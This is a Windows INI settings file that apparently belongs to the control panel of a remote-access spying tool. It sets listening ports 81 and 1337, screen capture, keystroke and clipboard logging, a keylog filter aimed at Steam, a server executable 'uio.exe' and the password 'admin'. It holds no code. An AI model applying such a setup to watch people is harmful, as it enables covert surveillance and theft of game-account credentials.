[Client]
Show=0
Column=0
Sort=0
Width=1547
Height=755
Left=241
Top=120
GroupOnline=1
Col0=100
Col1=100
Col2=80
Col3=130
Col4=100
Col5=80
Col6=80
Col7=110
Col8=80
Col9=100
Col10=50
Col11=50
Col12=70
[Settings]
Users=C:\Documents and Settings\Administrateur\Bureau
OfflineUsers=255
NotifyNew=0
NotifyLost=0
Tray=1
ScreenCap=0
StartScreenCap=1
SpecialKeys=1
TitleColour=32768
TimeColour=16711680
KeyColour=8421504
SpecialColour=255
ClipboardColour=33023
Ports=81:-1;1337:-1;
MaxTransfers=3
Skip=1
Mirror=0
UseSkin=0
SkinFile=
Update=0
Server=C:\Documents and Settings\Administrateur\Bureau\uio.exe
Password=admin
Sound=sound\sound.wav
PlaySound=1
RemoveDeadConnections=1
Cache=0
KeyLogFilter=steam:-16777203;
[ScreenCapture]
IncludeCursor=1
Quality=32
KeyPress=1
MouseClick=1
MouseMoves=0
Clipboard=0
Delay=1
Stretch=1
